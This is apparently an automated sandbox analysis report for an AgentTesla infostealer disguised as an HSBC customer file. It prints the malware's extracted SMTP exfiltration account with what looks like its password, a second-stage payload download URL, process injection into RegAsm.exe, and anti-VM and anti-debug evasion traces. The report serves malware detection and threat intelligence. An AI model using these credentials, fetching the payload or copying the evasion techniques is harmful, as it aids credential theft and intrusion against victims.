Source: HSBC Customer Information.exe.6392.0.memstrmin |
Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"} |
Source: HSBC Customer Information.exe |
Virustotal: Detection: 25% |
Perma Link |
Source: HSBC Customer Information.exe |
ReversingLabs: Detection: 20% |
Source: HSBC Customer Information.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: global traffic |
HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49791 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49791 -> 443 |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: http://127.0.0.1:HTTP/1.1 |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: http://DynDns.comDynDNS |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: http://cthUYD.com |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: https://api.ipify.org%GETMozilla/5.0 |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha |
Source: global traffic |
HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache |
Source: HSBC Customer Information.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_004017AC |
0_2_004017AC |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224282A |
0_2_0224282A |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022428A3 |
0_2_022428A3 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02245CAF |
0_2_02245CAF |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022406C3 |
0_2_022406C3 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240ED2 |
0_2_02240ED2 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240F34 |
0_2_02240F34 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240702 |
0_2_02240702 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224651E |
0_2_0224651E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 25_2_1DD747A0 |
25_2_1DD747A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 25_2_1DD74790 |
25_2_1DD74790 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process Stats: CPU usage > 98% |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process Stats: CPU usage > 98% |
Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe |
Source: HSBC Customer Information.exe |
Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe |
Source: HSBC Customer Information.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: HSBC Customer Information.exe |
Virustotal: Detection: 25% |
Source: HSBC Customer Information.exe |
ReversingLabs: Detection: 20% |
Source: HSBC Customer Information.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' |
|
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: classification engine |
Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01 |
Source: Yara match |
File source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_00407D36 push 0000000Fh; ret |
0_2_00407D56 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_004059AE push ecx; ret |
0_2_004059AF |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02241E3C push esp; ret |
0_2_02241E9D |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224460E push ebp; iretd |
0_2_022446A9 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02244412 push esp; retf |
0_2_02244413 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224301F push ebx; iretd |
0_2_02243026 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240A5C push esi; retf |
0_2_02240A5D |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022446B5 push ebp; iretd |
0_2_022446A9 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02242D18 push ebx; iretd |
0_2_02242D52 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02246B6D push ecx; retf |
0_2_02246B6E |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022441BE push ebx; iretd |
0_2_0224435E |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02241F89 push 0000001Dh; ret |
0_2_02241F8B |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02244192 push ebx; iretd |
0_2_0224435E |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022467E2 pushad ; retf |
0_2_022467F1 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022445F1 push ebp; iretd |
0_2_022446A9 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
RDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, 000000F3h 0x00000008 xor eax, edx 0x0000000a cmp cx, 00E8h 0x0000000f dec edi 0x00000010 cmp bx, 00DDh 0x00000015 fabs 0x00000017 jmp 00007FC36C4BB470h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FC36C4BB393h 0x00000022 cmp si, 00BBh 0x00000027 mov ebx, F06F76B6h 0x0000002c cmp dh, FFFFFFACh 0x0000002f sub ebx, 2716C148h 0x00000035 cmp ebx, 24h 0x00000038 xor ebx, 6F5BB001h 0x0000003e cmp di, 0030h 0x00000042 punpckldq mm1, mm7 0x00000045 jmp 00007FC36C4BB474h 0x00000047 xor ebx, A643056Fh 0x0000004d cmp ah, 00000026h 0x00000050 cmp cl, FFFFFF90h 0x00000053 rdtsc |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Window / User API: threadDelayed 684 |
Jump to behavior |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Window / User API: threadDelayed 9316 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Window / User API: threadDelayed 9139 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Window / User API: threadDelayed 685 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Program Manager |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Progman |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Progmanlock |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR |
Source: Yara match |
File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR |
Source: Yara match |
File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR |